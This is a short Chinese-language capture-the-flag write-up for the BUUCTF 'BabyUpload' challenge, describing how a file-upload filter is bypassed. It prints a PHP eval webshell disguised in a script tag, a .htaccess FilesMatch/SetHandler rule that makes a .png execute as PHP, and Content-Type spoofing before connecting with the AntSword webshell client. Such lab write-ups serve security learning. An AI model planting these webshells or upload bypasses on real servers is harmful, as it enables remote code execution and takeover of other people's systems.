buuctf BabyUpload

首先进来

可以看出是文件上传漏洞，直接bp抓上传文件的木马包看看

发到Repeater里看看

把1.jpg改成1.php会发现ph被过滤来在试试phtml之类的发现都不行，然后发现有.htaccess可以解决

htaccess唯一核心用途是：强制服务器把图片后缀（.png/.gif/.jpg）的文件当作 PHP 代码解析

然后先把1.jpg改成1.png发现<?php eval($_POST[cmd]);?>中<?也被过滤了可以把<?php eval($_POST[cmd]);改成<script language="php"> eval($_POST[cmd]);</script>

然后

就可以上传了但是<script language="php"> eval($_POST[cmd]);</script>还没有被解析所有还要上传.htaccess文件，这个文件有自己创，在文件里放

1. <FilesMatch "1.png">

2. SetHandler application/x-httpd-php

3. </FilesMatch>

这里的1.png一定要与前面的一样还有

这里的Content-Type: application/octet-stream要改成Content-Type:image/jpeg然后改成上传的<script language="php"> eval($_POST[cmd]);</script>木马就能被解析了在靶场

后upload/31e891fe8473da80494517cb53c63dca/1.png加上给的拼接发到蚁剑上

这里的密码cmd是因为<script language="php"> eval($_POST[cmd]);</script>这里的是cmd

然后进入对应的服务器后台就能找到flag了